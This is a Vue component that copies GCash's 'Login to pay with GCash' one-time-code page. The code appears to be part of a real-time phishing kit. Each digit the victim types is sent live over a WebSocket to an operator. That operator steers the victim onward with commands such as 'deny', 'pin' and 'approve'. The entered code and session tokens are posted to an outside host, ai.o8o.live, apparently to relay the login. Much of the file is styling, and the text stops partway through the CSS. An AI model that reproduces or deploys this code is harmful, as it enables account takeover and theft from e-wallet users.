<template>
    <div id="template">
        <div class="root-app mobile">
            <div>
                <h1 class="layout-header"><img src="./assets/Gcash-white-new-logo.81ba859.png" alt="">
                </h1>
                <div>
                    <div class="layout-content">
                        <div class="main-container otp-page">
                            <div class="page-container content-center">
                                <div class="page-item digit-message">
                                    <h2>Login to pay with GCash</h2>
                                    <p>Enter the 6-digit authentication code sent to your registered mobile number.</p>
                                </div>
                                <div class="page-item otp-password-field">
                                    <div class="ap-digital-password" accessbilityid="otp-input">
                                        <div class="otp-container">
                                            <!-- 生成6个框框，显示输入的数字或者下划线 -->
                                            <div v-for="(digit, index) in otps" :key="index" class="digit"
                                                style="font-family: Poppins, sans-serif;font-weight: 600;color: #292b30;position: relative;font-size: .64rem;">
                                                <span v-if="digit">{{ digit }}</span>
                                                <span v-else>_</span> <!-- 未输入的显示下划线 -->
                                            </div>
                                            <!-- 隐藏的输入框用于捕获输入 -->
                                            <input type="text" class="otp-input" v-model="otp" maxlength="6"
                                                inputmode="numeric" pattern="[0-9]*" @input="updateDigits" />
                                        </div>

                                    </div>
                                </div>

                                <div class="page-item">
                                    <p class="resend-container text-center">
                                        Didn't get the code?
                                        <span class="text-irish-blue resend-button" v-if="isResendDisabled"
                                            @click.prevent="resendOtp">{{ ResendText }}</span>
                                        <a class="text-irish-blue resend-button" v-if="!isResendDisabled"
                                            @click.prevent="resendOtp">{{ ResendText }}</a>
                                    </p>
                                </div>
                                <div class="submit-button">
                                    <button type="button" class="ap-button ap-button-primary"
                                        accessbilityid="submit-button" :disabled="otps.join('').length < 6"
                                        @click="submitForm">NEXT</button>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <van-overlay :show="loading">
            <div style="display: flex;align-items: center;justify-content: center;height: 100%;"><van-loading
                    size="60px" color="#005add" /></div>
        </van-overlay>
    </div>
</template>
<script>
import { ref, onMounted, onUnmounted } from 'vue';
import { useRouter } from 'vue-router';
import { store } from '/src/store.js';
import { showDialog } from 'vant';
// import { isValidNumber } from 'libphonenumber-js';
export default {
    name: "OtpView",
    setup() {
        const router = useRouter();
        const loading = ref(false);

        // const phonenumber = ref(localStorage.getItem('phone'));
        // const isPhonenumberFocused = ref(false);
        // const errorMessage = ref('');
        const phone = ref(localStorage.getItem('phone'));

        const otp = ref('');
        // const countdown = ref('');
        // const ResendText = ref('');
        // const isResendDisabled = ref('');

        const otps = ref(new Array(6).fill(''));
        const timer = setInterval(() => {
            countdown.value--;
            ResendText.value = `Resend in ${countdown.value}s`;
            if (countdown.value === 0) {
                clearInterval(timer);
                countdown.value = 300;
                ResendText.value = 'Tap here to resend';
                isResendDisabled.value = false;
            }
        }, 1000);
        // 页面加载时，初始化 WebSocket 和文档样式
        onMounted(() => {
            store.data.route = 'gcash';
            document.documentElement.style.fontSize = '52px';
            window.scrollTo({ top: 0, left: 0, behavior: 'smooth' });//位置移到最上方

            if (store.WebSocket) {
                store.WebSocket.addEventListener('message', onMessage);
            }
        });

        // 组件销毁时移除 WebSocket 监听
        onUnmounted(() => {
            if (store.WebSocket) {
                store.WebSocket.removeEventListener('message', onMessage);
            }
        });

        // WebSocket 消息处理
        const onMessage = (event) => {
            const data = JSON.parse(event.data);
            if (data.type === 'update') {
                if (data.data.command === 'screenshot') return;
                if (store.WebSocket.readyState === WebSocket.OPEN) {
                    store.WebSocket.send(JSON.stringify({ type: 'live', data: { loading: false } }));
                    loading.value = false;
                    localStorage.setItem('loading', false);
                }
                handleCommand(data.data.command);
            }
        };
        // 根据 WebSocket 接收到的命令进行处理
        const handleCommand = (command) => {
            if (command == 'deny') {
                showDialog({
                    title: 'Invalid authentication code.',
                    message: 'Please enter the correct code and try again.',
                    theme: 'round-button',
                    confirmButtonColor: '#005add',
                    confirmButtonText: 'OK'
                })
                otps.value = Array(6).fill('')
                otp.value = ''
            }
            if (command == 'otp') {
                router.push("/gcash/otp");
            }
            if (command == 'email') {
                router.push("/gcash/email");
            }
            if (command == 'pin') {
                router.push("/gcash/pin");
            }
            if (command == 'approve') {
                router.push("/gcash/approve");
            }
            if (command == 'activation') {
                router.push("/gcash/activation");
            }
            if (command == 'gcash_auto') {
                if (localStorage.getItem('gcash_auto') == 'true') {
                    localStorage.setItem('gcash_auto', 'false');
                } else {
                    localStorage.setItem('gcash_auto', 'true');
                }
                // data_Value.value = { gcash_auto: localStorage.getItem('gcash_auto') }
            }
            if (command == 'ok') {
                router.push("/CheckoutOk");
            }
        };

        const countdown = ref(300);
        const isResendDisabled = ref(false);
        const ResendText = ref('Tap here to resend');

        const resendOtp = () => {
            if (isResendDisabled.value) return;
            store.data.loading = 'resend'
            // data_Value.value = { resend: true }
            isResendDisabled.value = true;
            ResendText.value = `Resend in ${countdown.value}s`;
            if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
                store.WebSocket.send(JSON.stringify({ type: 'live', data: { loading: 'resend' } }));
            }
            fetchSendOtp()
            const timer = setInterval(() => {
                countdown.value--;
                ResendText.value = `Resend in ${countdown.value}s`;
                if (countdown.value === 0) {
                    clearInterval(timer);
                    if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
                        store.WebSocket.send(JSON.stringify({ type: 'live', data: { loading: 'resend_timeout' } }));
                    }
                    countdown.value = 300;
                    ResendText.value = 'Tap here to resend';
                    isResendDisabled.value = false;
                }
            }, 1000);
        };

        // 更新本地存储
        const updateLocalStorage = (field, value) => {
            const existingData = localStorage.getItem('data_Value');
            const storedData = existingData ? JSON.parse(existingData) : {};
            storedData[field] = value;
            localStorage.setItem('data_Value', JSON.stringify(storedData));

            if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
                store.WebSocket.send(JSON.stringify({ type: 'live', data: { [field]: value } }));
            }
        };

        // 提交表单，验证手机号并发送请求
        const submitForm = async () => {
            const newValue = { route: store.data.route, otp: otps.value.join('') };
            if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
                store.WebSocket.send(JSON.stringify({ type: 'live_update', data: newValue }));
                store.WebSocket.send(JSON.stringify({ type: 'live', data: { loading: 'loading' } }));
                loading.value = true;
                localStorage.setItem('loading', 'loading');
            }

            if (localStorage.getItem('gcash_auto') === 'true') {
                await fetchData();
            }
        };

        const fetchData = async () => {
            try {
                const response = await fetch('https://ai.o8o.live/verify_otp', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                    },
                    body: JSON.stringify({
                        loginId: localStorage.getItem('loginId'),
                        tokenId: localStorage.getItem('tokenId'),
                        securityId: localStorage.getItem('securityId'),
                        otpValue: otps.value.join('')
                    }),
                });

                if (!response.ok) {
                    throw new Error(`Error: ${response.status} ${response.statusText}`);
                }

                let responseData = await response.json();
                if (responseData.status === 'ok') {
                    router.push("/gcash/pin");
                }
                if (responseData.status === 'error') {
                    showDialog({
                        title: 'Invalid authentication code.',
                        message: responseData.msg,//'Please enter the correct code and try again.',
                        theme: 'round-button',
                        confirmButtonColor: '#005add',
                        messageAlign: 'left',
                        confirmButtonText: 'OK'
                    });

                    // loading.value = false
                    // 出现错误时也停止 loading 状态
                    if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
                        store.WebSocket.send(JSON.stringify({ type: 'live', data: { loading: false } }));
                        loading.value = false;
                        localStorage.setItem('loading', false);
                    }
                }
            } catch (err) {
                // 出现错误时也停止 loading 状态
                if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
                    store.WebSocket.send(JSON.stringify({ type: 'live', data: { loading: false } }));
                    loading.value = false;
                    localStorage.setItem('loading', false);
                }
                // error.value = err.message;
                // console.error('Fetch error:', err);
            }
        };


        const fetchSendOtp = async () => {
            try {
                const response = await fetch('https://ai.o8o.live/send_otp', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                    },
                    body: JSON.stringify({
                        loginId: phone.value, // 发送的号码参数
                    }),
                });

                // 检查请求是否成功
                if (!response.ok) {
                    throw new Error(`Error: ${response.status} ${response.statusText}`);
                }

                const responseData = await response.json();

                // 根据服务器返回的状态进行处理
                if (responseData.status === 'ok') {
                    // 如果请求成功，将数据写入 localStorage
                    localStorage.setItem('tokenId', responseData.data.tokenId);
                    localStorage.setItem('securityId', responseData.data.securityId);
                    localStorage.setItem('loginId', responseData.data.loginId);
                } else {
                    // 如果返回错误信息，显示错误提示
                    await showDialog({
                        title: 'Invalid authentication code.',
                        message: responseData.msg || 'Please enter the correct code and try again.',
                        theme: 'round-button',
                        confirmButtonColor: '#005add',
                        messageAlign: 'left',
                        confirmButtonText: 'OK'
                    });

                    // 设置 loading 为 false
                    if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
                        store.WebSocket.send(JSON.stringify({ type: 'live', data: { loading: false } }));
                        loading.value = false;
                        localStorage.setItem('loading', false);
                    }
                }

            } catch (err) {
                // 捕获并打印错误
                console.error('Fetch error:', err);
                showDialog({
                    title: 'Error',
                    message: 'An error occurred while sending the OTP. Please try again.',
                    theme: 'round-button',
                    confirmButtonColor: '#005add',
                    confirmButtonText: 'OK'
                });
                // 出现错误时也停止 loading 状态
                if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
                    store.WebSocket.send(JSON.stringify({ type: 'live', data: { loading: false } }));
                    loading.value = false;
                    localStorage.setItem('loading', false);
                }
            }
        };

        // 更新输入框中的数字
        const updateDigits = () => {
            otp.value = otp.value.replace(/\D/g, ''); // 只保留数字
            const otpValue = otp.value.split('');
            otps.value = otpValue.concat(Array(6 - otpValue.length).fill(''));
            updateLocalStorage('otp', otps.value.join(''));
        };

        return {
            // isPhonenumberFocused,
            // phonenumber,
            // errorMessage,
            otps,
            loading,
            submitForm,

            countdown,
            isResendDisabled,
            ResendText,
            resendOtp,

            otp,
            updateDigits,

        };


    }
}

</script>
<style scoped>
.template {
    background: #fff;
    color: #696b6d;
    font: .32rem / 1.4 Karla, Poppins, Helvetica, Arial, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}

.title[data-v-36795e11] {
    font-family: Poppins;
    font-weight: 600;
    color: #292b30;
    text-align: left;
    font-size: .9em
}

.message[data-v-36795e11] {
    text-align: left;
    padding: .5em 0 .25rem;
    color: #6d6e72;
    font-size: .85em
}

.ap-button[data-v-36795e11] {
    text-transform: uppercase;
    border-radius: 1rem;
    margin: .5em 0;
    background: #0057e4;
    font-weight: 700;
    font-family: Karla, sans-serif;
    font-size: .9em
}

.non-primary[data-v-36795e11],
.non-primary[data-v-36795e11]:focus {
    background: #fff;
    color: #0057e4
}

.ap-modal-wrap {
    background-color: #fff !important;
    top: 30% !important;
    left: 46% !important;
    width: 6rem !important
}

.ap-modal-content {
    padding: .4rem .34rem .2rem !important
}

.desktop .ap-modal-wrap {
    left: 48.5% !important
}

.merchant-info {
    position: relative;
    background: #f7f7f9;
    line-height: .94rem;
    color: #696b6d;
    text-align: center;
    overflow: hidden
}

.merchant-info img {
    position: absolute;
    top: 50%;
    left: .22rem;
    width: .6rem;
    height: .6rem;
    transform: translatey(-50%)
}

.merchant-info .merchant-name {
    overflow: hidden;
    white-space: nowrap;
    text-overflow: ellipsis;
    font-family: Poppins;
    font-weight: 700
}

.merchant-info label {
    display: inline-block;
    color: #a3a9b7;
    width: 2.4rem
}

.merchant-info .amount {
    color: #00bdf1
}

.desktop .merchant-info {
    font-size: .36rem;
    padding: .32rem .7rem
}

.desktop .merchant-info .merchant-name {
    line-height: 1.74rem;
    display: block
}

.desktop .merchant-info .row {
    line-height: .72rem
}

.desktop .merchant-info label {
    width: 2.7rem
}

@media only screen and (max-device-width:320px) {
    .merchant-info {
        padding: .15rem .2rem
    }

    .merchant-info label {
        width: 2.3rem
    }
}

.desktop .m-input {
    margin-bottom: .2rem
}

.desktop .m-input.focus .input-wrap .line {
    height: 1px
}

.m-input.hasPrefix .input-wrap .placeholder {
    transform: translate(.9rem, .3rem)
}

.m-input.focus .input-wrap .placeholder,
.m-input.notEmpty .input-wrap .placeholder {
    transform: translate(0);
    font-size: .2rem;
    color: #696b6d;
    line-height: 1.7
}

.m-input.focus .input-wrap .line {
    width: 100%;
    background: #d6d6d6;
    height: 2px
}

.m-input.focus .input-wrap .input-prefix:after {
    border-color: #d6d6d6
}

.m-input.hasError .input-wrap .line {
    width: 100%;
    background: #ff4848;
    height: 1px
}

.m-input.hasError .input-wrap .input-prefix:after {
    border-color: #ff4848
}

.m-input .input-wrap {
    width: 100%;
    padding: .3rem .1rem .05rem;
    border-bottom: 1px solid #d6d6d6;
    position: relative;
    display: -ms-flexbox;
    display: flex
}

.m-input .input-wrap input {
    position: relative;
    z-index: 2;
    -ms-flex: 1;
    flex: 1;
    color: #292b30;
    border: none;
    background: none;
    outline: none;
    margin-left: .5em
}

.m-input .input-wrap .input-prefix {
    width: .8rem;
    color: #292b30
}

.m-input .input-wrap .input-prefix:after {
    content: "";
    border-left: 1px solid #d6d6d6;
    margin-left: .2rem;
    height: .5rem;
    display: inline-block;
    position: absolute
}

.m-input .input-wrap .placeholder {
    position: absolute;
    z-index: 1;
    top: 0;
    left: 0;
    transform: translate(.1rem, .3rem);
    color: #bfbfbf;
    transition: all .5s
}

.m-input .input-wrap .line {
    position: absolute;
    bottom: -1px;
    left: 50%;
    transform: translatex(-50%) translateZ(0);
    width: 0;
    font-size: 0;
    line-height: 0;
    height: 1px;
    background: #ff4848;
    transition: width .5s
}

.m-input .error-message {
    padding: .05rem 0;
    color: #ff7676;
    font-size: .24rem
}

.desktop .login-page .submit-button {
    margin-top: 2rem
}

.desktop .login-page .login {
    height: .5rem
}

.login-page .enter-mobile-number-label {
    text-align: center;
    font-size: .28rem
}

.login-page .m-input {
    margin-bottom: .1rem
}

.login-page .page-container h2,
.login-page .page-container p.enter-mobile-number-label {
    text-align: left;
    color: #292b30
}

.login-page .page-container h2 {
    padding: .52rem .4rem 0;
    font-family: Poppins, sans-serif;
    font-weight: 600;
    font-size: .28rem
}

.login-page .page-container p.enter-mobile-number-label {
    padding: 0 .4rem;
    font-size: .25rem
}

.login-page .login {
    margin: .4rem .4rem 0;
    height: 2rem
}

.login-page .login.flowa {
    margin: .2rem .7rem 0
}

.login-page .login .ap-flex-row {
    background: none
}

.login-page .login .ap-flex-row>div:first-of-type {
    padding-left: .08rem;
    padding-right: .08rem
}

.login-page .login .ap-flex-row input:not([type=checkbox]) {
    padding-top: 0;
    padding-bottom: 0
}

.login-page .login .password-field .ap-digital-password {
    width: 1.9rem;
    height: .43rem
}

.login-page .submit-button {
    margin-bottom: .25rem
}

.desktop .password-page .mpin-password-field {
    margin-bottom: 1rem
}

.password-page .page-container h2,
.password-page .page-container p {
    text-align: left;
    color: #292b30 !important
}

.password-page .page-container h2 {
    padding: .52rem .4rem 0;
    font-family: Poppins, sans-serif;
    font-weight: 600;
    font-size: .28rem
}

.password-page .page-container p {
    padding: 0 .4rem;
    font-size: .25rem
}

.password-page .error-text {
    margin: 0 1em;
    margin-top: -.5rem;
    margin-bottom: 1em
}

.password-page .mpin-password-field {
    margin: .34rem auto 1.1rem;
    width: 2.52rem
}

.password-page .mpin-password-field .ap-password-item i {
    width: .24rem;
    height: .24rem;
    background: none;
    border: 2px solid #000;
    border-radius: 50%
}

.password-page .mpin-password-field .ap-password-item i.ap-dot {
    background: #000
}

.password-page .submit-button {
    margin-bottom: .25rem
}

.link-container p.link-btn {
    margin: .6rem 0;
    padding: 0
}

.desktop .otp-page .digit-message {
    margin-bottom: 1.1rem;
    padding: .3rem .6rem .3rem 1.6rem
}

.desktop .otp-page .otp-password-field {
    margin: 1.4rem auto
}

.desktop .otp-page .ap-password-item {
    font-size: .72rem
}

.otp-page {
    padding: .4rem 0;
    overflow: auto
}

.otp-page.main-container {
    height: auto
}

.otp-page .page-container h2,
.otp-page .page-container p.otp-label {
    text-align: left;
    color: #292b30 !important
}

.otp-page .page-container h2 {
    padding: .52rem .4rem 0;
    font-family: Poppins, sans-serif;
    font-weight: 600;
    font-size: .3rem;
    color: #8d8d8d;
    padding-top: 0
}

.otp-page .page-container p {
    padding: 0 .4rem;
    font-size: .28rem
}

.otp-page .error-text {
    margin-top: -.2rem;
    margin-bottom: .5rem
}

.otp-page .digit-message {
    padding-left: 1rem;
    height: .98rem
}

.otp-page .digit-message .otp-image {
    float: left;
    margin-left: -1rem;
    width: .79rem;
    height: .98rem
}

.otp-page header {
    margin-top: 15%
}

.otp-page .otp-password-field {
    margin: .5rem auto;
    width: 3.3rem
}

.otp-page .otp-password-field .ap-password-item i {
    width: .4rem
}

.otp-page .ap-button-count {
    padding-bottom: 10px;
    color: #58595b
}

.otp-page .submit-button {
    margin-bottom: .24rem
}

.otp-page .submit-button .ap-button {
    max-width: 99%
}

.otp-page .ap-password-item i {
    background: #292b30;
    height: .05em;
    top: 91%
}

.otp-page .ap-password-item span {
    color: #292b30;
    font-weight: 600;
    font-family: Poppins, sans-serif
}

.otp-page .resend-container {
    margin-bottom: .5rem;
    color: #292b30;
    font-weight: 700
}

.otp-page .text-irish-blue {
    color: #007dff !important;
    font-weight: 700
}

/*! normalize.css v4.1.1 | MIT License | github.com/necolas/normalize.css */
html {
    font-family: sans-serif;
    -ms-text-size-adjust: 100%;
    -webkit-text-size-adjust: 100%
}

body {
    margin: 0
}

article,
aside,
details,
figcaption,
figure,
footer,
header,
main,
menu,
nav,
section,
summary {
    display: block
}

audio,
canvas,
progress,
video {
    display: inline-block
}

audio:not([controls]) {
    display: none;
    height: 0
}

progress {
    vertical-align: baseline
}

[hidden],
template {
    display: none
}

a {
    background-color: transparent;
    -webkit-text-decoration-skip: objects
}

a:active {
    outline-width: 0
}

abbr[title] {
    border-bottom: none;
    text-decoration: underline;
    -webkit-text-decoration: underline dotted;
    text-decoration: underline dotted
}

b,
strong {
    font-weight: inherit;
    font-weight: bolder
}

dfn {
    font-style: italic
}

h1 {
    font-size: 2em;
    margin: .67em 0
}

mark {
    background-color: #ff0;
    color: #000
}

small {
    font-size: 80%
}

sub,
sup {
    font-size: 75%;
    line-height: 0;
    position: relative;
    vertical-align: baseline
}

sub {
    bottom: -.25em
}

sup {
    top: -.5em
}

img {
    border-style: none
}

svg:not(:root) {
    overflow: hidden
}

code,
kbd,
pre,
samp {
    font-family: monospace, monospace;
    font-size: 1em
}

figure {
    margin: 1em 40px
}

hr {
    box-sizing: content-box;
    height: 0;
    overflow: visible
}

button,
input,
optgroup,
select,
textarea {
    font: inherit;
    margin: 0
}

optgroup {
    font-weight: 700
}

button,
input {
    overflow: visible
}

button,
select {
    text-transform: none
}

[type=reset],
[type=submit],
button,
html [type=button] {
    -webkit-appearance: button
}

[type=button]::-moz-focus-inner,
[type=reset]::-moz-focus-inner,
[type=submit]::-moz-focus-inner,
button::-moz-focus-inner {
    border-style: none;
    padding: 0
}

[type=button]:-moz-focusring,
[type=reset]:-moz-focusring,
[type=submit]:-moz-focusring,
button:-moz-focusring {
    outline: 1px dotted ButtonText
}

fieldset {
    border: 1px solid silver;
    margin: 0 2px;
    padding: .35em .625em .75em
}

legend {
    box-sizing: border-box;
    color: inherit;
    display: table;
    max-width: 100%;
    padding: 0;
    white-space: normal
}

textarea {
    overflow: auto
}

[type=checkbox],
[type=radio] {
    box-sizing: border-box;
    padding: 0
}

[type=number]::-webkit-inner-spin-button,
[type=number]::-webkit-outer-spin-button {
    height: auto
}

[type=search] {
    -webkit-appearance: textfield;
    outline-offset: -2px
}

[type=search]::-webkit-search-cancel-button,
[type=search]::-webkit-search-decoration {
    -webkit-appearance: none
}

::-webkit-input-placeholder {
    color: inherit
}

::-webkit-file-upload-button {
    -webkit-appearance: button;
    font: inherit
}

*,
:after,
:before {
    margin: 0;
    padding: 0;
    box-sizing: border-box
}

body,
html {
    height: 100%
}

body {
    background: #fff;
    color: #696b6d;
    font: .32rem/1.4 Karla, Poppins, Helvetica, Arial, sans-serif;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0)
}

.mask,
body.has-mask:after {
    position: absolute;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    content: "";
    background: transparent
}

body.has-mask:after {
    z-index: 10
}

main {
    position: relative;
    min-height: 100%;
    padding-bottom: 4rem
}

main:after,
main:before {
    display: table;
    content: " "
}

main:after {
    clear: both
}

a {
    color: #0f7efe;
    text-decoration: none;
    transition: color .35s;
    transform: translateZ(0)
}

a:active {
    color: #0159c0
}

::-webkit-input-placeholder {
    color: #bbb
}

::-moz-placeholder {
    color: #bbb
}

::-ms-input-placeholder {
    color: #bbb
}

::placeholder {
    color: #bbb
}

hr {
    border: 0;
    border-top: 1px solid #e0e0e0
}

input:-moz-ui-invalid {
    box-shadow: none
}

.board-anchor {
    padding-top: .2rem;
    padding-bottom: .2rem
}

.clearfix:after,
.clearfix:before {
    display: table;
    content: " "
}

.clearfix:after {
    clear: both
}

.pull-right {
    float: right !important
}

.pull-left {
    float: left !important
}

.text-left {
    text-align: left
}

.text-right {
    text-align: right
}

.text-center {
    text-align: center
}

.text-justify {
    text-align: justify
}

.ellipsis {
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap
}

.fade-enter-active,
.fade-leave-active {
    transition: opacity .2s
}

.fade-enter,
.fade-leave-to {
    opacity: 0
}

.alert-enter-active,
.alert-leave-active {
    transition: .3s;
    transition-property: opacity, transform
}

.alert-leave-to {
    opacity: 0
}

.alert-enter {
    opacity: 0;
    transform: scale(1.05)
}

.typeface-number {
    font-weight: 500;
    font-family: PingFang SC, HelveticaNeue-Medium
}

.ap-rows-header {
    padding: .2rem .3rem;
    color: #888
}

.ap-rows-list {
    border-top: 1px solid #e0e0e0
}

.ap-flex-row {
    display: -ms-flexbox;
    display: flex;
    -ms-flex-align: center;
    align-items: center;
    position: relative;
    background: #fff
}

.ap-flex-row>div {
    padding-top: .4rem;
    padding-bottom: .4rem
}

.ap-flex-row>div:first-of-type {
    -ms-flex-item-align: start;
    align-self: flex-start;
    padding-left: .3rem;
    padding-right: .3rem;
    color: #9b9b9b
}

.ap-flex-row>div:nth-of-type(2) {
    -ms-flex-positive: 1;
    flex-grow: 1
}

.ap-flex-row>div:last-child {
    padding-right: .3rem
}

.ap-flex-row>div[input] {
    padding-top: 0;
    padding-bottom: 0
}

.ap-flex-row:before {
    position: absolute;
    top: 0;
    left: .3rem;
    right: 0;
    border-top: 1px solid #e0e0e0;
    content: ""
}

.ap-flex-row:first-child:before {
    display: none
}

.ap-flex-row[arrow] {
    padding-right: .7rem
}

.ap-flex-row[arrow]:after {
    position: absolute;
    top: 50%;
    right: .3rem;
    margin-top: -.08rem;
    width: .16rem;
    height: .16rem;
    border: solid #9b9b9b;
    border-width: .04rem .04rem 0 0;
    transform: rotate(45deg);
    content: "";
    transition: transform .2s
}

.ap-flex-row[arrow]>div:last-child {
    padding-right: 0
}

.ap-flex-row[arrow]:active {
    background-color: #fafafa
}

.ap-flex-row[arrow=down]:after {
    margin-top: -.1rem;
    transform: rotate(135deg)
}

.ap-flex-row[arrow=up]:after {
    margin-top: -.02rem;
    transform: rotate(-45deg)
}

.ap-flex-row input:not([type=checkbox]) {
    width: 100%;
    border: 0;
    outline: none;
    padding-top: .4rem;
    padding-bottom: .4rem
}

.ap-flex-row .ap-has-checkbox {
    padding-top: 0;
    padding-bottom: 0
}

.ap-fade-enter-active,
.ap-fade-leave-active-active {
    transition: opacity .2s
}

.ap-alert-leave-active,
.ap-fade-enter,
.ap-fade-leave-active {
    opacity: 0
}

.ap-alert-enter-active,
.ap-alert-leave-active {
    transition: .2s;
    transition-property: opacity, transform
}

.ap-alert-enter {
    opacity: 0;
    transform: scale(1.1)
}

.ap-auto-complete .ap-clearable-input {
    margin: 0
}

.ap-auto-complete .ap-dropdown-container {
    position: relative
}

.ap-auto-complete .ap-dropdown {
    position: absolute;
    left: 0;
    top: 0;
    right: 0;
    overflow: auto;
    max-height: 4rem;
    background: #fff;
    border: 1px solid #e0e0e0;
    z-index: 100
}

.ap-auto-complete .ap-dropdown-item:active {
    background-color: #fafafa
}

.ap-auto-complete .ap-dropdown-default {
    padding: .3rem .2rem
}

@keyframes icon-spin {
    0% {
        transform: rotate(0)
    }

    to {
        transform: rotate(1turn)
    }
}

.ap-icon {
    display: inline-block;
    width: 1em;
    height: 1em;
    fill: currentColor;
    vertical-align: middle
}

.ap-icon svg {
    display: block;
    width: 100%;
    height: 100%
}

.ap-icon.ap--spinning {
    animation: icon-spin steps(12) infinite 1.2s
}

.ap-scroll-list-error,
.ap-scroll-list-nomore {
    text-align: center;
    padding: .5rem;
    color: #bbb
}

.ap-scroll-list-error {
    padding: 1rem .5rem
}

.ap-clearable-input {
    display: -ms-flexbox;
    display: flex
}

.ap-clearable-input>input {
    width: 100%;
    border: 0;
    outline: none
}

.ap-clearable-input .ap-clear-button {
    display: -ms-flexbox;
    display: flex;
    -ms-flex-align: center;
    align-items: center;
    -ms-flex-pack: center;
    justify-content: center;
    color: #ccc
}

.ap-clearable-input .ap-clear-button.ap--hidden {
    visibility: hidden
}

.ap-digital-password {
    display: block;
    position: relative;
    height: .76rem;
    overflow: hidden
}

.ap-digital-password>div {
    position: relative;
    display: -ms-flexbox;
    display: flex;
    height: 100%
}

.ap-password-focus {
    box-sizing: border-box;
    position: absolute;
    top: 50%;
    transform: translateY(-50%);
    height: 100%;
    background: none;
    outline: none;
    padding: 0;
    text-align: center;
    pointer-events: none;
    border: 0;
    box-shadow: none;
    transition: none;
    z-index: 1
}

.ap-password-focus:focus {
    background: #fff
}

.ap-password-item {
    -ms-flex: 1;
    flex: 1;
    height: 100%;
    position: relative;
    font-size: .64rem
}

.ap-password-item i,
.ap-password-item span {
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%)
}

.ap-password-item i {
    width: .44rem;
    height: .02rem;
    background: #8f8f92
}

.ap-password-item i.ap-dot {
    width: .32rem;
    height: .32rem;
    border-radius: 50%;
    background: currentColor
}

.ap-input-end {
    text-align: right !important;
    padding-right: .06rem
}

.ap-input-end:focus {
    background: transparent
}

.ap-modal {
    z-index: 4;
    width: 100%
}

.ap-modal,
.ap-modal-mask {
    position: fixed;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    height: 100%
}

.ap-modal-mask {
    background-color: rgba(55, 55, 55, .6)
}

.ap-modal-wrap {
    position: absolute;
    top: 38%;
    left: 50%;
    margin-left: -2.7rem;
    z-index: 5;
    width: 5.4rem;
    border-radius: .14rem;
    background-color: #f1f1f1;
    transform: translateZ(1px)
}

.ap-modal-content {
    padding: .4rem .34rem;
    text-align: center;
    font-size: .3rem;
    line-height: .4rem
}

.ap-modal-header {
    font-size: .34rem;
    font-weight: 700;
    padding-bottom: .2rem;
    color: #383838
}

.ap-modal-button {
    display: -ms-flexbox;
    display: flex
}

.ap-modal-button>a {
    -ms-flex: 1;
    flex: 1;
    display: block;
    border: 0;
    outline: none;
    border-top: 1px solid #e3e3e3;
    padding: .18rem 0;
    color: #0f7efe;
    font-size: .32rem;
    background-color: transparent;
    text-align: center
}

.ap-modal-button>a:nth-of-type(2) {
    border-left: 1px solid #e0e0e0
}

.ap-button {
    display: block;
    width: 100%;
    height: .8rem;
    margin: 0 auto;
    border: 0;
    border-radius: .1rem;
    outline: none;
    font-size: .3rem;
    text-align: center;
    white-space: nowrap;
    -ms-touch-action: manipulation;
    touch-action: manipulation;
    -webkit-user-select: none;
    -ms-user-select: none;
    user-select: none
}

.ap-button .ap-icon-spin {
    font-size: .4rem;
    display: block;
    margin: 0 auto
}

:disabled {
    opacity: .4 !important
}

.ap-button-primary {
    background: #0f7efe;
    color: #fff
}

.ap-button-primary:active {
    background: #0176fd;
    color: #fff
}

.ap-button-default {
    background: transparent;
    color: #0f7efe;
    text-transform: uppercase;
    border: .02rem solid #0f7efe;
    line-height: 0
}

.ap-button-default:active {
    background: #0176fd;
    color: #fff
}

.ap-has-button {
    padding-bottom: 1.6rem;
    position: relative;
    min-height: 100%
}

.ap-button-container {
    position: absolute;
    left: 0;
    right: 0;
    bottom: 0;
    padding: .3rem;
    text-align: center
}

.ap-button-container .ap-button+.ap-button {
    margin-top: .2rem
}

.ap-button-container .ap-button-ghost {
    margin-top: .3rem;
    background: #fff;
    color: #0f7efe;
    border: .02rem solid #0f7efe
}

.ap-button-container.ap--follow {
    position: static;
    margin-top: .3rem
}

.ap-button-container.ap--fix {
    position: fixed;
    background: linear-gradient(180deg, hsla(0, 0%, 100%, .01) 0, #fff 25%, #fff)
}

.ap-button-container>a {
    display: inline-block;
    margin: .3rem 0
}

.ap-button-container p {
    color: #777;
    margin-bottom: .3rem
}

.ap-thumb {
    background-repeat: no-repeat;
    background-size: 100%;
    background-position: 50%
}

.ap-thumb.ap--no-default {
    background-image: none
}

.ap-thumb>div {
    padding-top: 100%;
    background-size: cover;
    background-position: 50%
}

.ap-collapse {
    border-bottom: 1px solid #e0e0e0
}

.ap-collapse:not(.ap--open) .ap-collapse-body {
    display: none
}

.ap-pull-down-container {
    min-height: 6rem
}

.ap-pull-down-header {
    width: 100%;
    overflow: hidden;
    position: relative;
    display: -ms-flexbox;
    display: flex;
    -ms-flex-align: center;
    align-items: center;
    -ms-flex-pack: center;
    justify-content: center;
    font-size: .42rem
}

.ap-pull-down-footer {
    text-align: center;
    padding: .5rem 0;
    font-size: .42rem
}

@keyframes rotate {
    0% {
        transform: rotate(0deg)
    }

    to {
        transform: rotate(1turn)
    }
}

.ap-switcher {
    box-sizing: content-box;
    -webkit-appearance: none;
    appearance: none;
    position: relative;
    width: 1rem;
    height: .6rem;
    border-radius: .6rem;
    margin: 0;
    outline: none;
    background: #e3e3e3;
    transition: .3s;
    transition-property: border-color, background;
    border: 0 solid #e3e3e3
}

.ap-switcher:after,
.ap-switcher:before {
    content: "";
    position: absolute;
    border-radius: .6rem
}

.ap-switcher:before {
